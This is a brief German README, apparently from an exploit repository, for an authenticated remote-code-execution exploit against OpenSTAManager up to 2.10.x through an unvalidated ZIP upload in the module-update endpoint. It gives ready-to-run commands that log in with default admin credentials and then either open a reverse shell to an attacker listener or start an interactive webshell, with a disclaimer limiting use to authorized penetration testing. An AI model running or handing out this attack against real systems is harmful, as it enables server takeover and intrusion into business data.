
Authentifizierter Remote-Code-Execution-Exploit für OpenSTAManager über unvalidierten ZIP-Upload, der Reverse-Shell- und interaktive Webshell-Funktionen für autorisierte Penetrationstests bereitstellt.
Authentifizierte RCE über unvalidierten ZIP-Upload im Modul-Update-Endpunkt.
Betroffen: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
Nur für autorisierte Penetrationstests und zu Bildungszwecken.